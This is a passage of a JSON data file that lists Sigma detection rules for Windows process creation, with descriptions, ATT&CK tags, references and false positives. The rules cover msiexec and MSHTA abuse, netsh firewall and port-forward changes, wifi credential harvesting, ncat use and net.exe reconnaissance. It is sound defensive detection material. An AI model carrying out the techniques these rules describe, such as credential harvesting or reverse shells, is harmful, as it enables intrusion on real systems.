- "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Windows command line executable started from MSHTA", - "uuid": "03cc0c25-389f-4bf8-b48d-11878079f1ca", - "value": "MSHTA Spawning Windows Shell", - "meta": { - "refs": [ - "https://www.trustedsec.com/july-2015/malicious-htas/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_spawn_shell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_mshta_spawn_shell.yml", - "author": "Michael Haag", - "level": "high", - "falsepositive": [ - "Printer software / driver installations", - "HP software" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", - "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", - "value": "Suspicious Msiexec Load DLL", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://twitter.com/_st0pp3r_/status/1583914515996897281", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/04/24", - "filename": "proc_creation_win_msiexec_dll.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", - "value": "Suspicious MsiExec Embedding Parent", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" - ], - "tags": [ - "attack.t1218.007", - "attack.defense_evasion" - ], - "creation_date": "2022/04/16", - "filename": "proc_creation_win_msiexec_embedding.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", - "value": "Suspicious Msiexec Execute Arbitrary DLL", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914515996897281", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/01/16", - "filename": "proc_creation_win_msiexec_execute_dll.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", - "value": "Suspicious Msiexec Quiet Install", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914244344799235", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/01/16", - "filename": "proc_creation_win_msiexec_install_quiet.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", - "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", - "value": "Suspicious Msiexec Quiet Install From Remote Location", - "meta": { - "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/10/28", - "filename": "proc_creation_win_msiexec_install_remote.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process injection using Microsoft Remote Asssistance (Msra.exe) which has been used for discovery and persistence tactics", - "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", - "value": "Msra.exe Process Injection", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", - "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2022/06/24", - "filename": "proc_creation_win_msra_process_injection.yml", - "author": "Alexander McDonald", - "level": "high", - "falsepositive": [ - "Legitimate use of Msra.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", - "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "value": "Remote Desktop Protocol Use Mstsc", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.001" - ], - "creation_date": "2022/01/07", - "filename": "proc_creation_win_mstsc.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects multiple suspicious process in a limited timeframe", - "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1", - "value": "Quick Execution of a Series of Suspicious Commands", - "meta": { - "refs": [ - "https://car.mitre.org/wiki/CAR-2013-04-002", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_multiple_susp_cli.yml" - ], - "tags": [ - "car.2013-04-002", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_multiple_susp_cli.yml", - "author": "juju4", - "level": "low", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "value": "Ncat Execution", - "meta": { - "refs": [ - "https://nmap.org/ncat/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1095" - ], - "creation_date": "2021/07/21", - "filename": "proc_creation_win_netcat_execution.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate ncat use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware", - "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", - "value": "Netsh RDP Port Opening", - "meta": { - "refs": [ - "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2020/05/23", - "filename": "proc_creation_win_netsh_allow_port_rdp.yml", - "author": "Sander Wiebing", - "level": "high", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Allow Incoming Connections by Port or Application on Windows Firewall", - "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", - "value": "Netsh Port or Application Allowed", - "meta": { - "refs": [ - "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", - "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2019/01/29", - "filename": "proc_creation_win_netsh_fw_add.yml", - "author": "Markus Neis, Sander Wiebing", - "level": "medium", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Netsh commands that allows a suspcious application location on Windows Firewall", - "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", - "value": "Netsh Program Allowed with Suspcious Location", - "meta": { - "refs": [ - "https://www.virusradar.com/en/Win32_Kasidet.AD/description", - "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2020/05/25", - "filename": "proc_creation_win_netsh_fw_add_susp_image.yml", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", - "uuid": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", - "value": "Netsh Firewall Rule Deletion", - "meta": { - "refs": [ - "https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2022/08/14", - "filename": "proc_creation_win_netsh_fw_delete.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", - "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", - "value": "Netsh Allow Group Policy on Microsoft Defender Firewall", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", - "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2022/01/09", - "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects capture a network trace via netsh.exe trace functionality", - "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118", - "value": "Capture a Network Trace with netsh.exe", - "meta": { - "refs": [ - "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_netsh_packet_capture.yml", - "author": "Kutepov Anton, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects netsh commands that configure a port forwarding (PortProxy)", - "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", - "value": "Netsh Port Forwarding", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://adepts.of0x.cc/netsh-portproxy-code/", - "https://www.dfirnotes.net/portproxy_detection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2019/01/29", - "filename": "proc_creation_win_netsh_port_fwd.yml", - "author": "Florian Roth, omkar72, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration", - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP", - "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", - "value": "Netsh RDP Port Forwarding", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2019/01/29", - "filename": "proc_creation_win_netsh_port_fwd_3389.yml", - "author": "Florian Roth, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect the harvesting of wifi credentials using netsh.exe", - "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff", - "value": "Harvesting of Wifi Credentials Using netsh.exe", - "meta": { - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" - ], - "creation_date": "2020/04/20", - "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml", - "author": "Andreas Hunkeler (@Karneades), oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", - "value": "Use of NetSupport Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsupport.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/09/25", - "filename": "proc_creation_win_netsupport.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", - "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", - "value": "Suspicious Scan Loop Network", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://ss64.com/nt/for.html", - "https://ss64.com/ps/foreach-object.htmll", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.discovery", - "attack.t1018" - ], - "creation_date": "2022/03/12", - "filename": "proc_creation_win_network_scan_loop.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", - "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", - "value": "Network Sniffing", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_sniffing.yml" - ], - "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_network_sniffing.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", - "uuid": "5b768e71-86f2-4879-b448-81061cbae951", - "value": "Suspicious Manipulation Of Default Accounts", - "meta": { - "refs": [ - "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2022/09/01", - "filename": "proc_creation_win_net_default_accounts_manipulation.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Some fasle positives could occure with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.", - "uuid": "62510e69-616b-4078-b371-847da438cc03", - "value": "Windows Network Enumeration", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ], - "creation_date": "2018/10/30", - "filename": "proc_creation_win_net_enum.yml", - "author": "Endgame, JHasenbusch (ported for oscd.community)", - "level": "low", - "falsepositive": [ - "Legitimate use of net.exe utility by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", - "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", - "value": "Suspicious Reconnaissance Activity Using Net", - "meta": { - "refs": [ - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_net_recon.yml", - "author": "Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Inventory tool runs", - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies creation of local users via the net.exe command.", - "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", - "value": "Net.exe User Account Creation", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001" - ], - "creation_date": "2018/10/30", - "filename": "proc_creation_win_net_user_add.yml", - "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", - "level": "medium", - "falsepositive": [ - "Legitimate user creation.", - "Better use event IDs for user creation rather than command line rules." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "uuid": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", - "value": "Net.exe User Account Creation - Never Expire", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001" - ], - "creation_date": "2022/07/12", - "filename": "proc_creation_win_net_user_add_never_expire.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an admin share is mounted using net.exe", - "uuid": "3abd6094-7027-475f-9630-8ab9be7b9725", - "value": "Mounted Windows Admin Shares with net.exe", - "meta": { - "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_admin_share.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_net_use_admin_share.yml", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", - "level": "medium", - "falsepositive": [ - "Administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", - "value": "New Network Provider - CommandLine", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", - "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2022/08/23", - "filename": "proc_creation_win_new_network_provider.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Other legitimate network providers used and not filtred in this rule" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of a new service.", - "uuid": "7fe71fc9-de3b-432a-8d57-8c809efc10ab", - "value": "New Service Creation", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_service_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_new_service_creation.yml", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administrator or user creates a service for legitimate reasons." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of nimgrab, a tool bundled with the Nim programming framework, downloading a file. This can be normal behaviour on developer systems.", - "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", - "value": "Nimgrab File Download", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nimgrab.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/08/28", - "filename": "proc_creation_win_nimgrab.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate use of Nim on developer systems" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects nltest commands that can be used for information discovery", - "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", - "value": "Recon Activity with NLTEST", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", - "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", - "https://attack.mitre.org/techniques/T1482/", - "https://attack.mitre.org/techniques/T1016/", - "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" - ], - "creation_date": "2021/07/24", - "filename": "proc_creation_win_nltest_recon.yml", - "author": "Craig Young, oscd.community, Georg Lauenstein", - "level": "medium", - "falsepositive": [ - "Legitimate administration use but user must be check out" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", - "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", - "value": "Node.exe Process Abuse", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", - "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", - "https://nodejs.org/api/cli.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_node_abuse.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.", - "uuid": "f4bbd493-b796-416e-bbf2-121235348529", - "value": "Non Interactive PowerShell", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_interactive_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/09/12", - "filename": "proc_creation_win_non_interactive_powershell.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", - "level": "low", - "falsepositive": [ - "Legitimate programs executing PowerShell scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", - "value": "Non-privileged Usage of Reg or Powershell", - "meta": { - "refs": [ - 